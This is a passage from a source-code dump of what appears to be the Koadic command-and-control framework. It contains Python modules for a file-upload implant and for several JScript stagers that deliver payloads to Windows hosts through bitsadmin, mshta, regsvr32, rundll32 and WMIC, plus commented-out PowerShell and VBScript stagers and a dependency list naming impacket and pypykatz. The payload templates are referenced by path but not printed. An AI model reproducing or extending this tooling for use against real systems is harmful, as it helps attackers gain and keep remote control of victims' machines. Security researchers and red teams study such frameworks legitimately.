super(UploadFileJob, self).report(handler, data) 23 | 24 | def done(self): 25 | self.results = self.data 26 | 27 | def display(self): 28 | pass 29 | 30 | class UploadFileImplant(core.implant.Implant): 31 | 32 | NAME = "Upload File" 33 | DESCRIPTION = "Uploads a local file the remote system." 34 | AUTHORS = ["RiskSense, Inc."] 35 | STATE = "implant/util/upload_file" 36 | 37 | def load(self): 38 | 39 | self.options.register("LFILE", "", "local file to upload") 40 | #self.options.register("FILE", "", "file name once uploaded") 41 | #self.options.register("EXEC", "false", "execute file?", enum=["true", "false"]) 42 | #self.options.register("OUTPUT", "false", "get output of exec?", enum=["true", "false"]) 43 | self.options.register("DIRECTORY", "%TEMP%", "writeable directory", required=False) 44 | self.options.register("FILE", "", "", hidden = True) 45 | 46 | def job(self): 47 | return UploadFileJob 48 | 49 | def run(self): 50 | payloads = {} 51 | #payloads["vbs"] = self.load_script("data/implant/util/upload_file.vbs", self.options) 52 | payloads["js"] = "data/implant/util/upload_file.js" 53 | 54 | self.dispatch(payloads, self.job) 55 | -------------------------------------------------------------------------------- /modules/stager/js/bitsadmin.py: -------------------------------------------------------------------------------- 1 | import core.stager 2 | import core.loader 3 | 4 | class BitsadminStager(core.stager.StagerWizard): 5 | 6 | NAME = "JScript Bitsadmin Stager" 7 | DESCRIPTION = "Listens for new sessions, using JScript Bitsadmin for payloads" 8 | AUTHORS = ['zerosum0x0'] 9 | 10 | WORKLOAD = "js" 11 | 12 | def __init__(self, shell): 13 | super(BitsadminStager, self).__init__(shell) # stupid hack inc! 14 | self.options.set("ENDPOINTTYPE", ".wsf") 15 | self.options.set("OBFUSCATE", "") 16 | 17 | def load(self): 18 | #self.options.set("SRVPORT", 9999) 19 | self.port = 9995 20 | 21 | self.stdlib = core.loader.load_script('data/stager/js/stdlib.js') 22 | self.stage = core.loader.load_script('data/stager/js/stage.js') 23 | self.stagetemplate = core.loader.load_script("data/stager/js/bitsadmin/template.wsf") 24 | self.stagecmd = core.loader.load_script("data/stager/js/bitsadmin/bitsadmin.cmd") 25 | self.forktemplate = core.loader.load_script("data/stager/js/mshta/template.hta") 26 | self.forkcmd = core.loader.load_script("data/stager/js/rundll32/rundll32.cmd") 27 | self.workload = "js" 28 | -------------------------------------------------------------------------------- /modules/stager/js/disk.py: -------------------------------------------------------------------------------- 1 | import core.stager 2 | import core.loader 3 | 4 | class DiskStager(core.stager.StagerWizard): 5 | 6 | NAME = "JScript Disk Stager" 7 | DESCRIPTION = "Listens for new sessions, using disk for payloads" 8 | AUTHORS = ['zerosum0x0'] 9 | 10 | WORKLOAD = "js" 11 | 12 | def load(self): 13 | #self.options.set("SRVPORT", 9996) 14 | self.port = 9996 15 | 16 | self.stdlib = core.loader.load_script('data/stager/js/stdlib.js') 17 | self.stage = core.loader.load_script('data/stager/js/stage.js') 18 | self.stagetemplate = core.loader.load_script("data/stager/js/mshta/template.hta") 19 | self.stagecmd = core.loader.load_script("data/stager/js/mshta/mshta.cmd") 20 | self.forktemplate = self.stagetemplate 21 | self.forkcmd = core.loader.load_script("data/stager/js/rundll32/rundll32.cmd") 22 | self.workload = "js" 23 | -------------------------------------------------------------------------------- /modules/stager/js/mshta.py: -------------------------------------------------------------------------------- 1 | import core.stager 2 | import core.loader 3 | 4 | class MSHTAStager(core.stager.StagerWizard): 5 | 6 | NAME = "JScript MSHTA Stager" 7 | DESCRIPTION = "Listens for new sessions, using JScript MSHTA for payloads" 8 | AUTHORS = ['zerosum0x0'] 9 | 10 | WORKLOAD = "js" 11 | 12 | def load(self): 13 | #self.options.set("SRVPORT", 9999) 14 | self.port = 9999 15 | 16 | self.workload = "js" 17 | 18 | self.stdlib = core.loader.load_script('data/stager/js/stdlib.js') 19 | self.stage = core.loader.load_script('data/stager/js/stage.js') 20 | self.stagetemplate = core.loader.load_script("data/stager/js/mshta/template.hta") 21 | self.stagecmd = core.loader.load_script("data/stager/js/mshta/mshta.cmd") 22 | self.forktemplate = self.stagetemplate 23 | self.forkcmd = core.loader.load_script("data/stager/js/rundll32/rundll32.cmd") 24 | -------------------------------------------------------------------------------- /modules/stager/js/regsvr.py: -------------------------------------------------------------------------------- 1 | import core.stager 2 | import core.loader 3 | 4 | class MSHTAStager(core.stager.StagerWizard): 5 | 6 | NAME = "JScript RegSvr Stager" 7 | DESCRIPTION = "Listens for new sessions, using COM+ RegSvr for payloads" 8 | AUTHORS = [ 'subTee', # discovery 9 | 'zerosum0x0' # stager 10 | ] 11 | 12 | WORKLOAD = "js" 13 | 14 | def load(self): 15 | #self.options.set("SRVPORT", 9998) 16 | self.port = 9998 17 | 18 | self.stdlib = core.loader.load_script('data/stager/js/stdlib.js') 19 | self.stage = core.loader.load_script('data/stager/js/stage.js') 20 | self.stagetemplate = core.loader.load_script("data/stager/js/regsvr/template.sct") 21 | self.stagecmd = core.loader.load_script("data/stager/js/regsvr/regsvr.cmd") 22 | self.forktemplate = self.stagetemplate 23 | self.forkcmd = self.stagecmd 24 | self.workload = "js" 25 | -------------------------------------------------------------------------------- /modules/stager/js/rundll32_js.py: -------------------------------------------------------------------------------- 1 | import core.stager 2 | import core.loader 3 | 4 | class RunDLL32JSStager(core.stager.StagerWizard): 5 | 6 | NAME = "JScript rundll32.exe JavaScript Stager" 7 | DESCRIPTION = "Listens for new sessions, using JavaScript for payloads" 8 | AUTHORS = ['zerosum0x0'] 9 | 10 | WORKLOAD = "js" 11 | 12 | def load(self): 13 | #self.options.set("SRVPORT", 9997) 14 | self.port = 9997 15 | 16 | self.stdlib = core.loader.load_script('data/stager/js/stdlib.js') 17 | self.stage = core.loader.load_script('data/stager/js/stage.js') 18 | self.stagetemplate = b"~SCRIPT~" 19 | self.stagecmd = core.loader.load_script("data/stager/js/rundll32_js/rundll32_js.cmd") 20 | self.forktemplate = core.loader.load_script("data/stager/js/mshta/template.hta") 21 | self.forkcmd = core.loader.load_script("data/stager/js/rundll32/rundll32.cmd") 22 | self.workload = "js" 23 | -------------------------------------------------------------------------------- /modules/stager/js/wmic.py: -------------------------------------------------------------------------------- 1 | import core.stager 2 | import core.loader 3 | 4 | class WMICStager(core.stager.StagerWizard): 5 | 6 | NAME = "JScript WMIC Stager" 7 | DESCRIPTION = "Listens for new sessions, using WMIC for payloads" 8 | AUTHORS = [ 9 | 'subTee', # discovery 10 | 'mattifestation', #discovery 11 | 'zerosum0x0' # stager 12 | ] 13 | 14 | WORKLOAD = "js" 15 | 16 | def __init__(self, shell): 17 | super(WMICStager, self).__init__(shell) # stupid hack inc! 18 | self.options.set("ENDPOINTTYPE", ".xsl") 19 | 20 | def load(self): 21 | #self.options.set("SRVPORT", 9998) 22 | self.port = 9996 23 | 24 | self.stdlib = core.loader.load_script('data/stager/js/stdlib.js') 25 | self.stage = core.loader.load_script('data/stager/js/stage.js') 26 | self.stagetemplate = core.loader.load_script("data/stager/js/wmic/template.xsl") 27 | self.stagecmd = core.loader.load_script("data/stager/js/wmic/wmic.cmd") 28 | self.forktemplate = self.stagetemplate 29 | self.forkcmd = self.stagecmd 30 | self.workload = "js" 31 | -------------------------------------------------------------------------------- /modules/stager/powershell.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import core.stager 4 | import random 5 | 6 | """ 7 | class PowerShellStager(core.stager.Stager): 8 | 9 | NAME = "PowerShell Stager" 10 | DESCRIPTION = "Listens for new sessions, using PowerShell for payloads" 11 | AUTHORS = ['RiskSense, Inc.'] 12 | 13 | def run(self): 14 | payloads = {} 15 | payloads["In Memory"] = self.load_file("data/stager/powershell/memory.cmd") 16 | 17 | self.start_server(payloads) 18 | 19 | def stage(self, server, handler, session): 20 | script = self.load_script("data/stager/powershell/payload.ps1") 21 | handler.send_ok(script) 22 | """ 23 | -------------------------------------------------------------------------------- /modules/stager/vbscript.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import core.stager 4 | from core.payload import Payload 5 | import random 6 | 7 | """ 8 | class VBScriptStager(core.stager.Stager): 9 | 10 | NAME = "VBScript Stager" 11 | DESCRIPTION = "Listens for new sessions, using VBScript for payloads" 12 | AUTHORS = ['RiskSense, Inc.'] 13 | 14 | # the type of job payloads 15 | WORKLOAD = "vbs" 16 | 17 | def run(self): 18 | payloads = [] 19 | payloads.append(Payload("In Memory (Windows 2000 SP3+)", self.load_file("data/stager/vbscript/mshta.cmd"))) 20 | payloads.append(Payload("On Disk (All Windows)", self.load_file("data/stager/vbscript/disk.cmd"))) 21 | 22 | self.start_server(payloads) 23 | 24 | def stage(self, server, handler, session, options): 25 | script = self.load_script("data/stager/vbscript/work.vbs", options, True, False) 26 | handler.reply(200, script) 27 | 28 | def job(self, server, handler, session, job, options): 29 | script = self.load_script("data/stager/vbscript/job.vbs", options) 30 | handler.reply(200, script) 31 | """ 32 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | impacket 2 | pycrypto 3 | pyasn1 4 | tabulate 5 | rjsmin 6 | pypykatz 7 | --------------------------------------------------------------------------------